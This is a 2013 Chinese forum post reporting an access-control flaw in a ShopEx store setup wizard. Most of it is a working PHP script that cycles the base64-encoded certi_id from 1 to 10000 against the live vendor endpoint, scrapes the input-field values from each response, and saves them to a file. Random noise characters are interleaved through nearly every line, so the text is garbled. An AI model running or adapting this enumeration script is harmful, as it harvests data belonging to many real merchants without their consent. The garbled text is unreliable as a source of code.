|
|
简要描述:6 f. z8 X. z4 D( W
ShopEx某接口缺陷,可遍历所有网站5 d7 S, @5 ^( R7 L- \6 f5 u
详细说明:& ]' ^- N' m0 N7 T( F
问题出现在shopex 网店使用向导页面 8 d& E% k; \, [
+ Y9 }3 j, y" ]" @- R
4 Q! p+ P( c: c+ T: I+ [& h4 V8 s# S, w* I/ @, Z2 Z( h
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
8 ~1 j) s4 A7 K- b& D( m8 a/ b3 K4 o1 S7 }% J" }4 F
" P6 D1 d" n7 L* q5 J2 {1 k3 P! F
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
. ^* `0 t8 |9 M% i, a# K/ ^3 ?0 P9 x% d: M
6 [8 F$ }" ^+ h$ m9 s: J- [ T
1 D" ~/ U5 I7 A7 Q5 s我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
q$ z! v& b2 x6 g
* n3 d3 @) K$ Y0 s/ o' j) v1 v" I5 Q: l
# K s% f8 j7 K8 Q1 N+ x. a! G$ z
<?php
5 p7 e; @7 P' Q) Z( a. q- \3 m: `$ m7 p
for ($i=1; $i < 10000; $i++) { //遍历4 q, f6 o; B8 Q4 f1 Q* h
3 c, e4 T4 B" t$ q( V
ShowshopExD($i);/ A: O H. g. }$ v w
8 x1 I0 }% A3 c$ q( ^
}0 y. _* N3 ^& F
7 g: B4 j- F; F! U8 b- W6 ? function ShowshopExD($cid) {
0 |. {8 M s G3 s- [3 u3 Y8 q# Q% Q2 {4 T
$url='http://guide.ecos.shopex.cn/step2.php';
. Y: Y _% S8 y) q. }/ r' B
+ D: z* ^* r0 p" d8 m2 _ $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');6 U3 |/ q' y# g K
& \- V% H% ?4 E' H $url = $url.'?refer='.$refer; h8 w& f9 F3 q; c1 P% I' [1 B
" T% \) u- B+ B6 p5 J6 S" h: o# Y4 M
$ch = curl_init($url);
0 b/ b- H5 E b& z! \
. Y1 ^% F( C" \ s. L curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
1 L" _. E+ F9 E# Z6 a7 j2 ]( ~5 I8 w1 v) a8 D
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
# \. z5 [' C5 W1 S/ D7 ?
+ F# a$ o1 u/ [& u $result = curl_exec($ch);: q1 C* W6 n5 r7 N) @8 y
& r, w1 ]$ R, ]. L+ P
$result = mb_convert_encoding($result, "gb2312", "UTF-8");' U2 j0 k- x; Y1 q! u: L
. {% P1 @- \2 C1 B/ L, K0 A( R' [ if(strpos($result,$refer))7 {& ^$ `8 T. y! c# o. P
2 U; P) p G, m% s8 I" }
{
: T9 b. G5 K3 ^/ y# m: O& x
- i% U7 p: ?" g) c $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
: S {: f' w& b' I. _4 t3 T" c
K- V# M/ h$ d4 K- N preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
& A" }: ^. {- j
8 I9 p3 \/ l' d" q& | V foreach ($value[1] as $key) {% \+ w; H( @7 V8 c
8 g& @" m. |: c+ A; n$ [ preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);% R' Z6 {* U3 `) T" O+ S% H6 h
2 H l& J8 w6 T echo $res[1][0].':'.$res[3][0]."\r\n";
' @/ H# Q- |9 @5 I
8 p3 t6 i, @, e; v+ `! m# H# r $col =$res[1][0].':'.$res[3][0]."\r\n"; % |- p) W/ M+ f5 k+ ^: y
, w: ~1 v# U. w d% N3 k2 s fwrite($fp, $col, strlen($col));
2 A" T! y; @1 C% ^
* g/ ?2 |9 D& _# ~+ p }( D- D5 z- J$ P. x, v' T! }; X5 v
" E# {/ O- A; k& G# d! r echo '--------------------------------'."\r\n";/ ]2 r: x% G7 `" W8 M* \4 S
* J: U7 S4 l7 ^$ ?& `2 N fclose($fp); + `6 e- k' q$ q! K" k) c* l
6 T- t! a; t6 J0 m$ l
}: X& U- Y9 `" ?' [6 ~
' c7 A5 T% O4 f7 K2 R0 I" w# z3 S flush();4 H5 r/ x- n+ ~: O# ~( A; Z$ S
8 x* b+ R4 @0 A6 q% \ curl_close($ch);: P( O. K9 F" h. c0 y% D
0 Y! }" l" o. m- q, F o6 \1 V$ q
}
. H1 I! z5 O/ j8 U
2 k. i1 ^& c8 Y; i# ~?>
8 _4 k8 w- j, L# _# M漏洞证明:" Q1 I* V% z }( _3 R: i$ t. G- F9 N
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg: Q# G( |0 `% {' r' j- B( f! u
refer换成其他加密方式
) x3 ^$ p( {% V8 l" g% p |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对